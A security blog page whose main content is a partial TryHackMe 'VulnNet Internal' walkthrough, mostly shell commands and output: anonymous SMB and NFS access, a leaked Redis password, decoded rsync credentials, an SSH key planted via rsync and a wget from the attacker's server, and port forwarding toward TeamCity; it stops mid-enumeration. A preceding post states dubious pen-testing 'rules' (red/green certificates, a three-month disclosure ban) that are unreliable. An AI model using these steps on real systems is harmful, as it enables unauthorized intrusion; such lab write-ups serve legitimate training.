-->

ABOUT US

Our development agency is committed to providing you the best service.

OUR TEAM

The awesome people behind our brand ... and their life motto.

  • Kumar Atul Jaiswal

    Ethical Hacker

    Hacking is a Speed of Innovation And Technology with Romance.

  • Kumar Atul Jaiswal

    CEO Of Hacking Truth

    Loopholes are every major Security,Just need to Understand it well.

  • Kumar Atul Jaiswal

    Web Developer

    Techonology is the best way to Change Everything, like Mindset Goal.

OUR SKILLS

We pride ourselves with strong, flexible and top notch skills.

Marketing

Development 90%
Design 80%
Marketing 70%

Websites

Development 90%
Design 80%
Marketing 70%

PR

Development 90%
Design 80%
Marketing 70%

ACHIEVEMENTS

We help our clients integrate, analyze, and use their data to improve their business.

150

GREAT PROJECTS

300

HAPPY CLIENTS

650

COFFEES DRUNK

1568

FACEBOOK LIKES

STRATEGY & CREATIVITY

Phasellus iaculis dolor nec urna nullam. Vivamus mattis blandit porttitor nullam.

PORTFOLIO

We pride ourselves on bringing a fresh perspective and effective marketing to each project.

Showing posts with label penetration testing. Show all posts
Showing posts with label penetration testing. Show all posts
  • The Hidden Agenda Of Companies Penetration Testing Rule

     

     

    The Hidden Agenda Of Companies Penetration Testing Rule


    So guys, todays blog is very important and informative. Today's topic is what actually happens in a real life penetration testing.

    There are so much rules and regulations for a beginner pen tester in a company. So in today's blog, I will share the steps which you have to follow while doing a pen test.

    What are the steps when you work in a real company as pen tester ? So, if you want to read this blog till the end. Let's begin.

    Firstly a proper aggrement is made defining you scope which contains what you can do and what you can't.

    Company may specify that you can't use automated tools and sometimes you have exploit mannually No restriction on programming, you can make any programme and you can use it. 



    Now a interesting thing, if you run a pen testing company and doing a pen testing engagement, your client can't change or deploy anything and this is the part of the rule. Suppose you have found all the vulnerabilities and made a proper report, the pen testing company will submit their client a red card. 



    This is basically a red certificate saying that they have completed the pen test and submited the report. After that, client has 30 days to fix all the vulnerabilities. When it get fixed, the client will inform the pen test company. The pen testing company will again test the client's server using the same methods as before. If all the vulnerablilities get pached, the pen test company will issue a green certificate.


    Now, lets come to rules. This specificly for Europian countries. A GDPR list is there to mesaure all the rate of vulnerabilities, so if somehow employe's data get leaked, government will charge the company and incase of any critical vulnerablities found, the company will have to do a pen test again in 2 months. This rule is for Europian countries.

     


    Brought to you by Hacking Truth

    Click Here 

     

    Hope you remember I told you, once a pen test is done, client has only 1 months to patch all the vulnerablities. If client doesn't response in that time, and if the pen test company finds a new bug on the 31st day, they will charge client company. thats a rule too. 



    Now if pen test is done and a bug is found within the 3 months of the previous pen test, they can't submit it, otherwise they will face legal consiquences. Because, if a new bug comes out within 3 months, it is considered that they knew it but didn't disclosed it. Thus legal problems can occur. There is a discloser policy where you can not share any pen test report within 3 months. You can not share anything regarding it. So many rules are there. It totaly depends countrywise and companywise.



    Hope you liked today's blog and don't forget to share. You can't find these type of blog anywhere else. Its a very unknown topic. I would also like to give a big shoutout to Trident Security.



    Disclaimer

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.



      - Hacking Truth by Kumar Atul Jaiswal



  • TryHackMe VulnNet Internal As a Penetration Testing

     

     

    TryHackMe VulnNet Internal As a Penetration Testing

     

     

    The platform develops virtual classrooms that not only allow users to deploy training environments with the click of a button, but also reinforce learning by adding a question-answer approach. Its a comfortable experience to learn using pre-designed courses which include virtual machines (VM) hosted in the cloud.

    TryHackMe VulnNet Internal As a Penetration Testing


    While using a question-answer model does make learning easier, TryHackMe allows users to create their own virtual classrooms to teach particular topics enabling them to become teachers. This not only provides other users with rich and varied content, but also helps creators reinforce their understanding of fundamental concepts.
      

     

    VulnNet Entertainment learns from its mistakes, and now they have something new for you...TryHackMe VulnNet Internal As a Penetration Testing


    We start of my driving of tryhackme this room a quick scan on all ports using threader300 and simultaneously running nmap service scan to cover the top ports

     

     

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ sudo nmap -A -T4 -Pn  -sV -vv -p- 10.10.155.145
    [sudo] password for hackerboy: 
    Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-10 19:10 IST
    NSE: Loaded 153 scripts for scanning.
    NSE: Script Pre-scanning.
    Scanning 10.10.155.145 [65535 ports]
    Discovered open port 111/tcp on 10.10.155.145
    Discovered open port 22/tcp on 10.10.155.145
    Discovered open port 139/tcp on 10.10.155.145
    Discovered open port 445/tcp on 10.10.155.145
    Discovered open port 45811/tcp on 10.10.155.145
    Discovered open port 51665/tcp on 10.10.155.145
    Discovered open port 57017/tcp on 10.10.155.145
    Discovered open port 39557/tcp on 10.10.155.145
    Discovered open port 2049/tcp on 10.10.155.145
    Discovered open port 6379/tcp on 10.10.155.145
    Discovered open port 873/tcp on 10.10.155.145
    Completed SYN Stealth Scan at 19:19, 520.86s elapsed (65535 total ports)
    Nmap scan report for 10.10.155.145
    Host is up, received user-set (0.21s latency).
    Scanned at 2021-05-10 19:10:58 IST for 561s
    Not shown: 65523 closed ports
    Reason: 65523 resets
    PORT      STATE    SERVICE     REASON         VERSION
    22/tcp    open     ssh         syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   2048 5e:27:8f:48:ae:2f:f8:89:bb:89:13:e3:9a:fd:63:40 (RSA)
    | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDagA3GVO7hKpJpO1Vr6+z3Y9xjoeihZFWXSrBG2MImbpPH6jk+1KyJwQpGmhMEGhGADM1LbmYf3goHku11Ttb0gbXaCt+mw1Ea+K0H00jA0ce2gBqev+PwZz0ysxCLUbYXCSv5Dd1XSa67ITSg7A6h+aRfkEVN2zrbM5xBQiQv6aBgyaAvEHqQ73nZbPdtwoIGkm7VL9DATomofcEykaXo3tmjF2vRTN614H0PpfZBteRpHoJI4uzjwXeGVOU/VZcl7EMBd/MRHdspvULJXiI476ID/ZoQLT2zQf5Q2vqI3ulMj5CB29ryxq58TVGSz/sFv1ZBPbfOl9OvuBM5BTBV
    |   256 f4:fe:0b:e2:5c:88:b5:63:13:85:50:dd:d5:86:ab:bd (ECDSA)
    | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNM0XfxK0hrF7d4C5DCyQGK3ml9U0y3Nhcvm6N9R+qv2iKW21CNEFjYf+ZEEi7lInOU9uP2A0HZG35kEVmuideE=
    |   256 82:ea:48:85:f0:2a:23:7e:0e:a9:d9:14:0a:60:2f:ad (ED25519)
    |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJPRO3XCBfxEo0XhViW8m/V+IlTWehTvWOyMDOWNJj+i
    111/tcp   open     rpcbind     syn-ack ttl 63 2-4 (RPC #100000)
    | rpcinfo: 
    |   program version    port/proto  service
    |   100000  2,3,4        111/tcp   rpcbind
    |   100000  2,3,4        111/udp   rpcbind
    |   100000  3,4          111/tcp6  rpcbind
    |   100000  3,4          111/udp6  rpcbind
    |   100003  3           2049/udp   nfs
    |   100003  3           2049/udp6  nfs
    |   100003  3,4         2049/tcp   nfs
    |   100003  3,4         2049/tcp6  nfs
    |   100005  1,2,3      40068/udp6  mountd
    |   100005  1,2,3      51665/tcp   mountd
    |   100005  1,2,3      51843/tcp6  mountd
    |   100005  1,2,3      56229/udp   mountd
    |   100021  1,3,4      39572/udp6  nlockmgr
    |   100021  1,3,4      39935/tcp6  nlockmgr
    |   100021  1,3,4      45811/tcp   nlockmgr
    |   100021  1,3,4      48120/udp   nlockmgr
    |   100227  3           2049/tcp   nfs_acl
    |   100227  3           2049/tcp6  nfs_acl
    |   100227  3           2049/udp   nfs_acl
    |_  100227  3           2049/udp6  nfs_acl
    139/tcp   open     netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    445/tcp   open     netbios-ssn syn-ack ttl 63 Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
    873/tcp   open     rsync       syn-ack ttl 63 (protocol version 31)
    2049/tcp  open     nfs_acl     syn-ack ttl 63 3 (RPC #100227)
    6379/tcp  open     redis       syn-ack ttl 63 Redis key-value store
    9090/tcp  filtered zeus-admin  no-response
    39557/tcp open     mountd      syn-ack ttl 63 1-3 (RPC #100005)
    45811/tcp open     nlockmgr    syn-ack ttl 63 1-4 (RPC #100021)
    51665/tcp open     mountd      syn-ack ttl 63 1-3 (RPC #100005)
    57017/tcp open     mountd      syn-ack ttl 63 1-3 (RPC #100005)
    TCP/IP fingerprint:
    OS:SCAN(V=7.91%E=4%D=5/10%OT=22%CT=1%CU=40428%PV=Y%DS=2%DC=T%G=Y%TM=60993A1
    OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
    OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
    OS:=S)
    
    Uptime guess: 30.994 days (since Fri Apr  9 19:28:16 2021)
    Network Distance: 2 hops
    TCP Sequence Prediction: Difficulty=262 (Good luck!)
    IP ID Sequence Generation: All zeros
    Service Info: Host: VULNNET-INTERNAL; OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    Nmap done: 1 IP address (1 host up) scanned in 562.27 seconds
               Raw packets sent: 69689 (3.070MB) | Rcvd: 70367 (3.159MB)
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ 
    
    
    
    
    
    



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ sudo nmap -p 445  --script=smb-enum-shares.nse, smb-enum-users.nse  10.10.155.145   130 ⨯
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-10 19:46 IST
    Failed to resolve "smb-enum-users.nse".
    Nmap scan report for 10.10.155.145
    Host is up (0.21s latency).
    
    PORT    STATE SERVICE
    445/tcp open  microsoft-ds
    
    Host script results:
    | smb-enum-shares: 
    |   account_used: guest
    |   \\10.10.155.145\IPC$: 
    |     Type: STYPE_IPC_HIDDEN
    |     Comment: IPC Service (vulnnet-internal server (Samba, Ubuntu))
    |     Users: 1
    |     Max Users: 
    |     Path: C:\tmp
    |     Anonymous access: READ/WRITE
    |     Current user access: READ/WRITE
    |   \\10.10.155.145\print$: 
    |     Type: STYPE_DISKTREE
    |     Comment: Printer Drivers
    |     Users: 0
    |     Max Users: 
    |     Path: C:\var\lib\samba\printers
    |     Anonymous access: 
    |     Current user access: 
    |   \\10.10.155.145\shares: 
    |     Type: STYPE_DISKTREE
    |     Comment: VulnNet Business Shares
    |     Users: 0
    |     Max Users: 
    |     Path: C:\opt\shares
    |     Anonymous access: READ/WRITE
    |_    Current user access: READ/WRITE
    
    Nmap done: 1 IP address (1 host up) scanned in 32.14 seconds
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$                                                       
    
    
    

     

     

     

    so, after observing the whole nmap output process we decide that we need to enumerate serveral ports, otherwise we will enumerate with SMB.


    SMB Enumeration: 138 & 445

     

     

    so we will use enum4linux tool in our machine with vulnerable macine IP

     

     





    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
    └─$ enum4linux 10.10.155.145                                                   
    Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon May 10 19:11:45 2021
    
     ========================== 
    |    Target Information    |
     ========================== 
    Target ........... 10.10.155.145
    RID Range ........ 500-550,1000-1050
    Username ......... ''
    Password ......... ''
    Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
    
    
    
     ========================================== 
    |    Share Enumeration on 10.10.155.145    |
     ========================================== 
    
            Sharename       Type      Comment
            ---------       ----      -------
            print$          Disk      Printer Drivers
            shares          Disk      VulnNet Business Shares
            IPC$            IPC       IPC Service (vulnnet-internal server (Samba, Ubuntu))
    SMB1 disabled -- no workgroup available
    
    [+] Attempting to map shares on 10.10.155.145
    //10.10.155.145/print$  Mapping: DENIED, Listing: N/A
    //10.10.155.145/shares  Mapping: OK, Listing: OK
    //10.10.155.145/IPC$    [E] Can't understand response:
    NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
    
     ===================================================== 
    |    www.kumaratuljaiswal.in www.hackingtruth.in     |
     ===================================================== 
    
    
    enum4linux complete on Mon May 10 19:27:33 2021
    
                                                                                                                                          
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
    └─$ 
    
    
    
    
    
    

     

     


     

    I can connect to shares without supplying a password


     

     


     

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
    └─$ sudo smbclient //10.10.155.145/shares                                                 1 ⨯
    Enter WORKGROUP\root's password: 
    Try "help" to get a list of possible commands.            
    smb: \> ls
    
      temp                                D        0  Sat Feb  6 17:15:10 2021
      data                                D        0  Tue Feb  2 14:57:33 2021
    
                    11309648 blocks of size 1024. 3275872 blocks available
    
    smb: \> cd temp
    smb: \temp\> ls
    
      services.txt                        N       38  Sat Feb  6 17:15:09 2021
    
                    11309648 blocks of size 1024. 3275872 blocks available
    smb: \temp\> get services.txt
    getting file \temp\services.txt of size 38 as services.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec) 
    smb: \temp\> cd ..
    smb: \> ls
    
      temp                                D        0  Sat Feb  6 17:15:10 2021
      data                                D        0  Tue Feb  2 14:57:33 2021
    
                    11309648 blocks of size 1024. 3275868 blocks available
    smb: \> cd data
    smb: \data\> ls
    
      data.txt                            N       48  Tue Feb  2 14:51:18 2021
      business-req.txt                    N      190  Tue Feb  2 14:57:33 2021
    
                    11309648 blocks of size 1024. 3275868 blocks available
    smb: \data\> get data.txt
    getting file \data\data.txt of size 48 as data.txt (0.1 KiloBytes/sec) (average 0.0 KiloBytes/sec)
    smb: \data\> get business-req.txt
    getting file \data\business-req.txt of size 190 as business-req.txt (0.2 KiloBytes/sec) (average 0.1 KiloBytes/sec)
    smb: \data\> ls
    
      data.txt                            N       48  Tue Feb  2 14:51:18 2021
      business-req.txt                    N      190  Tue Feb  2 14:57:33 2021
    
                    11309648 blocks of size 1024. 3275868 blocks available
    smb: \data\> cd 
    smb: \> pwd
    Current directory is \\10.10.155.145\shares\
    smb: \> exit
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
    
    
    
    

     

     


     

     

     

    Browsing whole around the SMB services, only one file contains useful information, the services.txt

    so, as you can see... downloading and reading this file I find the first flag

     

     

     


     

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
    └─$ cat services.txt    
    THM{0a09d51e488f5fa105d8d866a497440a}
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
    └─$ cat data.txt    
    Purge regularly data that is not needed anymore
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
    └─$ cat business-req.txt
    We just wanted to remind you that we’re waiting for the DOCUMENT you agreed to send us so we can complete the TRANSACTION we discussed.
    If you have any questions, please text or phone us.
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
    └─$                          
    
    
    
    
    

     

     


     


    I also found NFS open, so I can look to see if I can mount to anything

     

     

     

     


     

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ sudo showmount -e 10.10.155.145               
    Export list for 10.10.155.145:
    /opt/conf *
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$
    
    

     

     


     

     

    Exploit

     

     

    We start by listing the share’s available to be mounted from the server using showmount, then we mount the share on out local machine in the conf directory
     

     


     


     

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ mkdir conf            
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ sudo mount -t nfs 10.10.155.145:/opt/conf conf
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ ls
    conf
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ cd conf  
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf]
    └─$ ls
    hp  init  opt  profile.d  redis  vim  wildmidi
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf]
    └─$ cd redis 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf/redis]
    └─$ ls
    redis.conf
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf/redis]
    └─$    
    
    

     

     


     

     

     

     

    Enumerating the share, we quickly dive down to the Redis directory to find notable information in the redis.conf file..(save this password anywhere)

     

     

     

     


     

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf/redis]
    └─$ ls
    redis.conf
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf/redis]
    └─$ cat redis.conf 
    # Redis configuration file example.
    #
    
    # If the master is password protected (using the "requirepass" configuration
    # directive below) it is possible to tell the slave to authenticate before
    # starting the replication synchronization process, otherwise the master will
    # refuse the slave request.
    #
    # masterauth 
    
    requirepass "B65Hx562F@ggAZ@F"
    #
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet/conf/redis]
    └─$ 
    

     

     


     

     

    REDIS Enumeration : 6379

     

    REDIS the Remote Dictionary Server is an in-memory database we could enumerate Redis with either Netcat, MSF auxiliary scanner or Redis-cli

     

    But first you need to install redis-cli in your linux & whatever you have..

     

    apt-get insall redis-tool

     

    using Redis-cli which the best in my opinion we connect to the Redis server using the credentials we found in the mount earlier then query it for the list and content of database it holds

     

    I found a redis password, so I can use this to login to the open redis port

     

     

    hello myself kumar atul jaiswal and i am a cyber security specialist

     

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ redis-cli -h 10.10.155.145 -a B65Hx562F@ggAZ@F
    Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
    10.10.155.145:6379> keys *
    1) "marketlist"
    2) "tmp"
    3) "internal flag"
    4) "int"
    5) "authlist"
    10.10.155.145:6379> get "internal flag"
    "THM{ff8e518addbbddb74531a724236a8221}"
    10.10.155.145:6379> 
                                    
    


     


    A list of useful commands can be found at: https://redis.io/commands After playing around and through trial and error, I was finally able to locate the internal flag

     

    Once again, after trying different commands, I was finally able to access the authlist.

     




     

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ redis-cli -h 10.10.155.145 -a B65Hx562F@ggAZ@F
    Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
    10.10.155.145:6379> keys *
    1) "marketlist"
    2) "tmp"
    3) "internal flag"
    4) "int"
    5) "authlist"
    10.10.155.145:6379> type authlist
    list                                                                                                                                            
    10.10.155.145:6379> lrange authlist 1 100
    1) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="                           
    2) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="                                       
    3) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="                                       
    10.10.155.145:6379> 
    

     

     


     

    Decoding the cypher

     

    From the look of it, we can tell that it's encoded in base64. Let's decode it.

     

     


     

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
    └─$ echo "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==" | base64 -d
    Authorization for rsync://rsync-connect@127.0.0.1 with password Hcg3HP67@TW@Bc72v
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
    └─$ echo "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==" | base64 -d 
    Authorization for rsync://rsync-connect@127.0.0.1 with password Hcg3HP67@TW@Bc72v
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop]
    └─$ 
    
    

     

     

    This leads us to rsync; again this is not at all surprising as we saw all these services running in our initial nmap scan.

     

    Enumerating rsync


    A quick refresher using --help shows us the switches we need to use.

     

     


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ rsync -av --list-only rsync://10.10.155.145:873
    files           Necessary home interaction
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$
    
    

     

     

    Creating a folder and copying the files

     

    Browsing the directory, we can find user.txt. Other than that, there isn't anything useful here, except for the username. Now we can try to upload a public ssh key to the server and ssh into it.

     


     

     



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ mkdir files                                                                                                                  10 ⨯
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ rsync -av rsync://rsync-connect@10.10.155.145:873/files ./rsync                                                              10 ⨯
    Password: 
    receiving incremental file list
    created directory ./rsync
    ./
    sys-internal/
    sys-internal/.bashrc
    sys-internal/.rediscli_history -> /dev/null
    sys-internal/.sudo_as_admin_successful
    sys-internal/.xsession-errors.old
    sys-internal/user.txt
    
    
    
    

     

     



    I can download files, like user.txt, but I also have the ability to upload files. I can upload an authorized_keys file to .ssh that I made so I can login through SSH. To start, I create the keys on my local system


     

     

    without pass


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ ssh-keygen -f ./id_rsa                                                             
    Generating public/private rsa key pair.
    Enter passphrase (empty for no passphrase): 
    Enter same passphrase again: 
    Your identification has been saved in ./id_rsa
    Your public key has been saved in ./id_rsa.pub
    The key fingerprint is:
    SHA256:I7t5fUgaY64/PuMwMpQKdzKt6/b0nnOMyjWauT33GfI hackerboy@KumarAtulJaiswal
    The key's randomart image is:
    +---[RSA 3072]----+
    |                 |
    |                 |
    |                 |
    |   . .           |
    |. + = . S        |
    | o B   o+..      |
    |  o + *=.*..     |
    |  .+ X+B@ooo.    |
    | oo.O+O@+=E.     |
    +----[SHA256]-----+
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ 
    

     

     


     

    With this created, I change the named of id_rsa.pub to authorized_keys then upload the file.

     

     



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ ls                                                                                                                                    
    id_rsa  id_rsa.pub  
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ sudo cp id_rsa.pub authorized_keys                                                 
    [sudo] password for hackerboy: 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ ls
    authorized_keys id_rsa  id_rsa.pub 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$
    
    

     

     


     

    with this password Hcg3HP67@TW@Bc72v

     


     

     



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ rsync -ahv ./id_rsa.pub rsync://rsync-connect@10.10.155.145:873/files/sys-internal/.ssh/authorized_keys --inplace --no-o --no-g
    Password: 
    sending incremental file list
    id_rsa.pub
    
    sent 674 bytes  received 35 bytes  18.42 bytes/sec
    total size is 580  speedup is 0.82
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ 
    

     

     



    Other Method for Uploading a File


    with python3 we are doing a file transfer with this command

    python3 -m http.server 1234

     

     

     



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ python3 -m http.server 1234                                                                                                            10 ⨯
    Serving HTTP on 0.0.0.0 port 1234 (http://0.0.0.0:1234/) ...
    10.8.61.234 - - [10/May/2021 23:15:41] "GET / HTTP/1.1" 200 -
    10.8.61.234 - - [10/May/2021 23:15:41] code 404, message File not found
    10.8.61.234 - - [10/May/2021 23:15:41] "GET /favicon.ico HTTP/1.1" 404 -
    10.10.155.145 - - [10/May/2021 23:16:15] "GET /authorized_keys HTTP/1.1" 200 -
    ^C  
    Keyboard interrupt received, exiting.
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ 
    

     

     


     

     

    then go to in our browser and type in the search bar 10.8.61.234:1234 (with own IP and port which is used to above the command). 

     

     

     


     



    Copy the file link (authorized keys)

    and download in vulnerable machine(sys-internal@vulnet-internal) via wget command. (Note - wget tool already installed in sys-internal machine except curl)

     

     


    sys-internal@vulnnet-internal:~/.ssh$ wget http://10.8.61.234:1234/authorized_keys
    --2021-05-10 14:16:10--  http://10.8.61.234:1234/authorized_keys
    Connecting to 10.8.61.234:1234... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 580 [application/octet-stream]
    Saving to: ‘authorized_keys.1’
    
    authorized_keys                 100%[===========================================================>]     580  --.-KB/s    in 0s      
    
    2021-05-10 14:16:11 (76.5 MB/s) - ‘authorized_keys.1’ saved [580/580]
    
    sys-internal@vulnnet-internal:~/.ssh$ ls
    authorized_keys  authorized_keys
    sys-internal@vulnnet-internal:~/.ssh$ 
    

     

     


     

     

    I can now login as sys-internal through SSH in our machine.

     


     

     


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ ssh -i id_rsa sys-internal@10.10.155.145
    Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-135-generic x86_64)
    
     * Documentation:  https://help.ubuntu.com
     * Management:     https://landscape.canonical.com
     * Support:        https://ubuntu.com/advantage
    
    
     * Canonical Livepatch is available for installation.
       - Reduce system reboots and improve kernel security. Activate at:
         https://ubuntu.com/livepatch
    
    541 packages can be updated.
    342 updates are security updates.
    
    Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
    
    Last login: Mon May 10 13:57:55 2021 from 10.8.61.234
    sys-internal@vulnnet-internal:~$ whoami
    sys-internal
    sys-internal@vulnnet-internal:~$ #www.kumaratuljaiswal.in
    sys-internal@vulnnet-internal:~$ ls
    Desktop  Documents  Downloads  Music  Pictures  Public  Templates  user.txt  Videos
    sys-internal@vulnnet-internal:~$ 
    

     

     


     

    Privilege Escalation

     

    Manually enumerating, I find a directory under / named TeamCity. Looking at this, I see it is running a webserver

    and

    cat TeamCity-readme.txt

     

     



    sys-internal@vulnnet-internal:~$ cd /TeamCity
    sys-internal@vulnnet-internal:/TeamCity$ ls
    bin          buildAgent  devPackage  licenses  service.properties   temp                webapps
    BUILD_85899  conf        lib         logs      TeamCity-readme.txt  Tomcat-running.txt  work
    sys-internal@vulnnet-internal:/TeamCity$ cat  TeamCity-readme.txt
    This is the JetBrains TeamCity home directory.
    
    For evaluation purposes, we recommend running both server and agent. If you need to run only the TeamCity server, execute:
    * On Windows: `.\bin\teamcity-server.bat start`
    * On Linux and macOS: `./bin/teamcity-server.sh start`
    sys-internal@vulnnet-internal:/TeamCity$
    sys-internal@vulnnet-internal:/TeamCity$
    
    
    

     

     

     

     


     

     

    sys-internal@vulnnet-internal:/TeamCity$
    sys-internal@vulnnet-internal:/TeamCity$ ss | grep 8111
    tcp  ESTAB      0       0                          [::ffff:127.0.0.1]:58689                                 [::ffff:127.0.0.1]:8111                             
    tcp  CLOSE-WAIT 1       0                          [::ffff:127.0.0.1]:39595                                 [::ffff:127.0.0.1]:8111                             
    tcp  ESTAB      0       0                          [::ffff:127.0.0.1]:8111                                  [::ffff:127.0.0.1]:58689                            
    sys-internal@vulnnet-internal:/TeamCity$ 
    

     

     

     

    I can set up an SSH port forwarding so I can access port 8111 on my localhost

     

     

     


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vulnet]
    └─$ ssh sys-internal@10.10.155.145 -i id_rsa -L 8111:localhost:8111
    Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-135-generic x86_64)
    
     * Documentation:  https://help.ubuntu.com
     * Management:     https://landscape.canonical.com
     * Support:        https://ubuntu.com/advantage
    
    
     * Canonical Livepatch is available for installation.
       - Reduce system reboots and improve kernel security. Activate at:
         https://ubuntu.com/livepatch
    
    541 packages can be updated.
    342 updates are security updates.
    
    Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
    
    Last login: Mon May 10 14:20:06 2021 from 10.8.61.234
    sys-internal@vulnnet-internal:~$ 
    
    
    

     

     


     

     

    Now when I go to localhost:8111 I can connect to TeamCity and it is running version 2.2.



     


     

     

     

    When I click on Login as Super User I see I need a Authentication Token. Going back to my SSH session, I can grep for an authentication token

     


    sys-internal@vulnnet-internal:/TeamCity$ grep -r "authentication token"
    grep: temp/jna-3506402: Permission denied
    grep: webapps/ROOT/plugins/TeamCity.SharedResources: Permission denied
